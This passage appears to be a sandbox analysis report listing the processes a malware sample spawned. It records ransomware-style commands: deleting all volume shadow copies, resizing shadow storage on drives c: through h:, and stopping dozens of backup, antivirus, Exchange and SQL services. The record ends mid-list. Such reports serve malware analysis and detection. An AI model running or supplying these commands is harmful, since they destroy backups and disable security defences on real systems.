PID 1708 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1708 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe

"C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\SysWOW64\net.exe

net stop AcronisAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net.exe

net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Antivirus /y

C:\Windows\SysWOW64\net.exe

net stop Antivirus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Antivirus /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ARSM /y

C:\Windows\SysWOW64\net.exe

net stop ARSM /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ARSM /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop bedbg /y

C:\Windows\SysWOW64\net.exe

net stop bedbg /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop bedbg /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop DCAgent /y

C:\Windows\SysWOW64\net.exe

net stop DCAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop DCAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPSecurityService /y

C:\Windows\SysWOW64\net.exe

net stop EPSecurityService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPSecurityService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPUpdateService /y

C:\Windows\SysWOW64\net.exe

net stop EPUpdateService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPUpdateService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net.exe

net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EraserSvc11710 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EsgShKernel /y

C:\Windows\SysWOW64\net.exe

net stop EsgShKernel /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EsgShKernel /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop FA_Scheduler /y

C:\Windows\SysWOW64\net.exe

net stop FA_Scheduler /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop FA_Scheduler /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IISAdmin /y

C:\Windows\SysWOW64\net.exe

net stop IISAdmin /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IISAdmin /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IMAP4Svc /y

C:\Windows\SysWOW64\net.exe

net stop IMAP4Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IMAP4Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McShield /y

C:\Windows\SysWOW64\net.exe

net stop McShield /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McShield /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McTaskManager /y

C:\Windows\SysWOW64\net.exe

net stop McTaskManager /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McTaskManager /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfemms /y

C:\Windows\SysWOW64\net.exe

net stop mfemms /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfemms /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfevtp /y

C:\Windows\SysWOW64\net.exe

net stop mfevtp /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfevtp /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MMS /y

C:\Windows\SysWOW64\net.exe

net stop MMS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MMS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mozyprobackup /y

C:\Windows\SysWOW64\net.exe

net stop mozyprobackup /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mozyprobackup /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer110 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeES /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeES /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeES /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeIS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeIS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeIS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMGMT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMTA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSRS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MySQL57 /y

C:\Windows\SysWOW64\net.exe

net stop MySQL57 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MySQL57 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ntrtscan /y

C:\Windows\SysWOW64\net.exe

net stop ntrtscan /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ntrtscan /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net.exe

net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop OracleClientCache80 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\SysWOW64\net.exe

net stop PDVFSService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop POP3Svc /y

C:\Windows\SysWOW64\net.exe

net stop POP3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop POP3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop RESvc /y

C:\Windows\SysWOW64\net.exe

net stop RESvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop RESvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sacsvr /y

C:\Windows\SysWOW64\net.exe

net stop sacsvr /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sacsvr /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SamSs /y

C:\Windows\SysWOW64\net.exe

net stop SamSs /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SamSs /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVAdminService /y

C:\Windows\SysWOW64\net.exe

net stop SAVAdminService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVAdminService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVService /y

C:\Windows\SysWOW64\net.exe

net stop SAVService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SDRSVC /y

C:\Windows\SysWOW64\net.exe

net stop SDRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SDRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SepMasterService /y

C:\Windows\SysWOW64\net.exe

net stop SepMasterService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SepMasterService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ShMonitor /y

C:\Windows\SysWOW64\net.exe

net stop ShMonitor /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ShMonitor /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Smcinst /y

C:\Windows\SysWOW64\net.exe

net stop Smcinst /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Smcinst /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SmcService /y

C:\Windows\SysWOW64\net.exe

net stop SmcService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SmcService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SMTPSvc /y

C:\Windows\SysWOW64\net.exe

net stop SMTPSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SMTPSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

